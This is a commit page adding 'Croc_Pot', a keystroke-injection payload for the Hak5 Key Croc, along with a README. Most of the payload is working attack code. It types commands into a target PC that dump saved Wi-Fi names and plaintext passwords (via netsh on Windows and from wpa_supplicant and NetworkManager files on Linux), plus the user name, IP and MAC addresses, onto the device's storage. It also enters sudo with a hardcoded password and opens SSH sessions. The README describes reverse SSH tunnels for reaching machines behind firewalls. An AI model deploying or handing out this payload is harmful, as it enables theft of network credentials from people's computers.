Merge pull request #23 from spywill/master

Croc_Pot
2021-10-02 14:59:55 -05:00 · 2021-10-02 14:59:55 -05:00 · feb6ec1e01
parent ebe6665412 063f09cfa1
commit feb6ec1e01
3 changed files with 6127 additions and 0 deletions
--- a/library/Croc_Pot/Croc_Pot.sh
+++ b/library/Croc_Pot/Croc_Pot.sh
--- a/library/Croc_Pot/Croc_Pot_Payload.txt
+++ b/library/Croc_Pot/Croc_Pot_Payload.txt
@ -0,0 +1,377 @@
 # Title:         Croc_Pot Payload
 # Description:   Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
 #                This will collect some data off target PC
 #                (ip address, current user name, pc host name, ssid and passwd, mac address)
 #                save to tools/Croc_pot folder
 # Author:        Spywill
 # Version:       1.3.1
 # Category:      Key Croc
 MATCH crocpot
 #---> Edit KEYCROC_PASSWD_HERE
 CROC_PW=hak5croc
 #---> Edit LINUX-PC_PASSWD_HERE
 PC_PW=LINUX
 #---> Save keycroc passwd in temp folder
 #---> This is used for starting Reverse SSH Tunnel with Target PC
 echo "${CROC_PW}" >> /tmp/CPW.txt
 #----Create Croc_Pot folders
 if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
 	LED B
 else
 	mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
 fi
 #---> Payload variable/remove existing OS detection
 CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
 cat > ${CROC_OS}
 rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
 #---> Enter ethernet mode for OS detection
 ATTACKMODE AUTO_ETHERNET
 LED ATTACK
 #---> Keycroc built in functions to retrieve target PC Loot
 GET TARGET_OS
 GET TARGET_IP
 GET HOST_IP
 GET TARGET_HOSTNAME
 #---> After OS detection case TARGET_OS value
 case $TARGET_OS in
 WINDOWS)
 	LED R
 	#---> Enter Storage mode on keycroc
 	ATTACKMODE HID STORAGE
 	sleep 1
 	#---> Start windows powershell
 	Q GUI r
 	sleep 1
 	Q STRING "powershell"
 	Q ENTER
 	sleep 5
 	#---> Place keycroc usb drive into variable
 	Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
 	Q ENTER
 	sleep 2
 	#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
 	Q ENTER
 	sleep 3
 	#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
 	Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
 	Q ENTER
 	sleep 3
 	#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
 	Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
 	Q ENTER
 	sleep 2
 	#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
 	Q STRING "arp -a 172.16.84.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
 	Q ENTER
 	sleep 2
 	#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
 	Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
 	Q ENTER
 	sleep 2
 	#---> Return back to ATTACKMODE HID mode
 	ATTACKMODE HID
 	sleep 1
 	#---> Start SSH session with target PC
 	Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
 	Q ENTER
 	sleep 2
 	#---> Entering keycroc passwd
 	Q STRING "${CROC_PW}"
 	Q ENTER
 	sleep 2
 	#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
 	echo "$TARGET_OS" >> ${CROC_OS}
 	echo "$TARGET_IP" >> ${CROC_OS}
 	echo "$TARGET_HOSTNAME" >> ${CROC_OS}
 	echo "$HOST_IP" >> ${CROC_OS}
 	#---> Edit with sed to remove powershell output "r" endlines & remove first character
 	$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
 	$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
 	#---> Starting Croc_Pot
 	Q STRING "/root/udisk/tools/Croc_Pot.sh"
 	Q ENTER ;;
 MACOS)
 	#---> Return back to ATTACKMODE HID mode
 	ATTACKMODE HID
 	LED G
 	sleep 1
 	#---> Start mac os terminal
 	Q GUI-SPACE
 	sleep 1
 	Q STRING "terminal"
 	Q ENTER
 	sleep 2
 	#---> Start SSH session with target PC
 	Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
 	Q ENTER
 	sleep 2
 	#---> Entering keycroc passwd
 	Q STRING "${CROC_PW}"
 	Q ENTER
 	sleep 1
 	#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
 	echo "$TARGET_OS" >> ${CROC_OS}
 	echo "$TARGET_IP" >> ${CROC_OS}
 	echo "$TARGET_HOSTNAME" >> ${CROC_OS}
 	echo "$HOST_IP" >> ${CROC_OS}
 	#---> Starting Croc_Pot
 	Q STRING "/root/udisk/tools/Croc_Pot.sh"
 	Q ENTER ;;
 LINUX)
 	#---> Enter Storage mode on keycroc
 	ATTACKMODE HID STORAGE
 	LED B
 	sleep 3
 	#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
 	case $TARGET_HOSTNAME in
 raspberrypi)
 	#---> Start Raspberry pi 4 terminal -->gnome-terminal installed<--
 	Q GUI d
 	sleep 1
 	Q STRING "terminal"
 	Q ENTER
 	Q ENTER
 	sleep 2
 	#---> Place keycroc usb drive into variable
 	Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
 	Q ENTER
 	#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "whoami | tee \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
 	Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
 	Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
 	Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
 	Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Return back to ATTACKMODE HID mode
 	ATTACKMODE HID
 	sleep 1
 	#---> Start SSH session with target PC
 	Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
 	Q ENTER
 	sleep 2
 	#---> Entering keycroc passwd
 	Q STRING "${CROC_PW}"
 	Q ENTER
 	#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
 	echo "$TARGET_OS" | tee -a ${CROC_OS}
 	echo "$TARGET_IP" | tee -a ${CROC_OS}
 	echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
 	echo "$HOST_IP" | tee -a ${CROC_OS}
 	#---> Starting Croc_Pot
 	Q STRING "/root/udisk/tools/Croc_Pot.sh"
 	Q ENTER ;;
 parrot)
 	#---> Start mate-terminal -->Parrot OS<--
 	Q ALT F2
 	sleep 1
 	Q STRING "mate-terminal"
 	Q ENTER
 	sleep 1
 	#---> Create keycroc directory
 	Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	#---> Entering Linux passwd
 	Q STRING "${PC_PW}"
 	Q ENTER
 	sleep 1
 	#---> Mount keycroc usb drive to target pc
 	Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
 	Q ENTER
 	sleep 1
 	#---> Make KeyCroc folder executable
 	Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	sleep 1
 	#---> Place keycroc usb drive into variable
 	Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
 	Q ENTER
 	#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "whoami | tee \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
 	Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
 	Q ENTER
 	sleep 5
 	#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
 	Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
 	Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
 	Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Unmount keycroc usb drive
 	Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	sleep 1
 	#---> Return back to ATTACKMODE HID mode
 	ATTACKMODE HID
 	#---> Remove keycroc directory off target pc
 	Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	sleep 2
 	#---> Start SSH session with target PC
 	Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
 	Q ENTER
 	sleep 1
 	#---> Entering keycroc passwd
 	Q STRING "${CROC_PW}"
 	Q ENTER
 	#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
 	echo "$TARGET_OS" | tee -a ${CROC_OS}
 	echo "$TARGET_IP" | tee -a ${CROC_OS}
 	echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
 	echo "$HOST_IP" | tee -a ${CROC_OS}
 	#---> Starting Croc_Pot
 	Q STRING "/root/udisk/tools/Croc_Pot.sh"
 	Q ENTER ;;
 *)
 	#---> Start linux distributions terminal xterm 
 	#---> Unsure of which linux distribution this will work on
 	Q ALT F2
 	sleep 1
 	Q STRING "xterm"
 	Q ENTER
 	sleep 1
 	#---> Create keycroc directory
 	Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	#---> Entering Linux passwd
 	Q STRING "${PC_PW}"
 	Q ENTER
 	sleep 1
 	#---> Mount keycroc usb drive to target pc
 	Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
 	Q ENTER
 	sleep 1
 	#---> Make KeyCroc folder executable
 	Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	sleep 1
 	#---> Place keycroc usb drive into variable
 	Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
 	Q ENTER
 	#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "whoami | tee \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
 	Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
 	Q ENTER
 	sleep 1
 	#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
 	Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
 	Q ENTER
 	sleep 5
 	#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
 	Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
 	Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
 	Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
 	Q ENTER
 	sleep 2
 	#---> Unmount keycroc usb drive
 	Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	sleep 1
 	#---> Return back to ATTACKMODE HID mode
 	ATTACKMODE HID
 	#---> Remove keycroc directory off target pc
 	Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
 	Q ENTER
 	sleep 2
 	#---> Start SSH session with target PC
 	Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
 	Q ENTER
 	sleep 1
 	#---> Entering keycroc passwd
 	Q STRING "${CROC_PW}"
 	Q ENTER
 	#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
 	echo "$TARGET_OS" | tee -a ${CROC_OS}
 	echo "$TARGET_IP" | tee -a ${CROC_OS}
 	echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
 	echo "$HOST_IP" | tee -a ${CROC_OS}
 	#---> Starting Croc_Pot
 	Q STRING "/root/udisk/tools/Croc_Pot.sh"
 	Q ENTER ;;
 	esac
 	;;
 esac
--- a/library/Croc_Pot/README.md
+++ b/library/Croc_Pot/README.md
@ -0,0 +1,68 @@
 # Croc_Pot
 ## INTRODUCTION :
  - This project is developed for the HAK5 KeyCroc (Croc_Pot in development and testing)
 * **Croc_Pot_Payload.txt**
  - Will start OS detection scan to see what OS the keycroc is pluged into (usb), collect some data off the target pc, automatically start an SSH session with connected target pc (wifi) and start Croc_Pot script
  - Ensure your keycroc is connected to the target pc wifi first before running **crocpot** If you do not have the target pc wifi credentials Croc_Pot has a payload to get you online (payload called getonline working on windows and Raspberry pi in development for linux version)
 * **Croc_Pot.sh**
  - This project is to automate some commands for the keycroc for quicker setup, install payloads, remotely connect to keycroc, nmap tcpdump target pc scan, edited files on your keycroc, send e-mail from your keycroc, SSH to hak5 gear, run hak5 cloud C2 on keycroc, status of your keycroc, and more 
 * **TESTED ON**
  - Windows 10
  - Raspberry pi 4 with gnome-terminal installed
  - linux parrot os
  - Sorry no support for MAC OS
 ## INSTALLATION :
 * Two file to this script
  - Will need to enter arming mode on your keycroc to install files.
  - First file is called **Croc_Pot.sh** Place this in the KeyCroc **tools folder**.
  - Second file is called **Croc_Pot_Payload.txt** Place this in the KeyCroc **payload folder**.
  - Edited the Croc_Pot_Payload.txt file for your keycroc passwd. default is (hak5croc)
  - Ensure your KeyCroc is connected (wifi) to the same local network as the target pc
 ## STARTING CROC_POT :
  - First way to start Croc_Pot.sh is ssh into your keycroc and type **/root/udisk/tools/Croc_Pot.sh**.
  - Second way to start Croc_Pot.sh is type in anywhere **crocpot** this will start Croc_Pot.sh script automatically.
  - It is recommended to start Croc_Pot.sh script with typing in **crocpot** as this payload will collect some data off the target pc. Some of the info that it will collect will be Target pc (ip address, current user name, pc host name, ssid and passwd, mac address), This info will be used in the Croc_Pot.sh script. 
  - **NOTE:** When running **crocpot** scan takes about 30-40 sec to start because of OS detection then Croc_Pot will start.
 ## SSH MENU :
 ### SSH TO HAK5 GEAR
 * Ensure all hak5 gear is connected to the same local network as your keycroc
   - Recommended to setup ssh PUBLIC AND PRIVATE KEY to each of your hak5 gear, SSH to your gear Without Password
   - SSH keycroc to Bash Bunny setup, first ensure your bash bunny has internet connection and connected to the same pc as your Keycroc, (bash bunny internet setup can be found at docs.hak5.org), Croc_Pot.sh will create a payload for your bash bunny, this file will be saved on your keycroc at tools/Croc_Pot/Bunny_Payload_Shell then copy this file to one of the payload switches on your bash bunny this is to start Reverse SSH Tunnel to keycroc.
 ### CREATE PUBLIC AND PRIVATE KEY
 * Perform SSH Login Without Password Using ssh-keygen & ssh-copy-id
 * Step 1: Create public and private keys using ssh-key-gen on local-host
  - jsmith@local-host$ **Note: You are on local-host here**
  - jsmith@local-host$ **ssh-keygen**
  - [Press enter key]
 * Step 2: Copy the public key to remote-host using ssh-copy-id
   - jsmith@local-host$ **ssh-copy-id -i ~/.ssh/id_rsa.pub username@remote-host-ip**
   - jsmith@remote-host's password:
 * Step 3: Login to remote-host without entering the password
   -jsmith@local-host$ **ssh username@remote-host-ip**
 * The above 3 simple steps should get the job done in most cases.
 ### Setup Reverse SSH Tunnel
   - Reverse SSH is a technique that can be used to access systems (that are behind a firewall) from the outside world.
   - Here is the command for remote server side
   - **ssh -fN -R 7000:localhost:22 username@your-Machine-ipaddress**
   - Now do an ssh connection request from your machine to your own machine at port 7000:
   - **ssh username@localhost -p 7000**
   - Here, though it may seem like you are doing ssh on localhost but your request would be forwarded to remote host. So, you should use your account ? username ? on remote server and when prompted for password, enter the corresponding password.
 ### Screenshot
 ![Screenshot from 2021-08-12 07-54-07](https://user-images.githubusercontent.com/71735542/129192585-d0933663-748a-4000-9102-6e1ceb4a851c.png)
 ![Screenshot from 2021-08-12 07-57-38](https://user-images.githubusercontent.com/71735542/129192913-8b880ee7-31f3-41ba-ac6b-59188e594460.png)
 ![Screenshot from 2021-08-12 08-00-12](https://user-images.githubusercontent.com/71735542/129193161-60bea2b4-99f5-4781-8a8c-dbd7d4b3d27f.png)
 ![Screenshot from 2021-08-12 08-03-59](https://user-images.githubusercontent.com/71735542/129193656-fbfcbc3c-207b-4555-be22-32a66cbe9aea.png)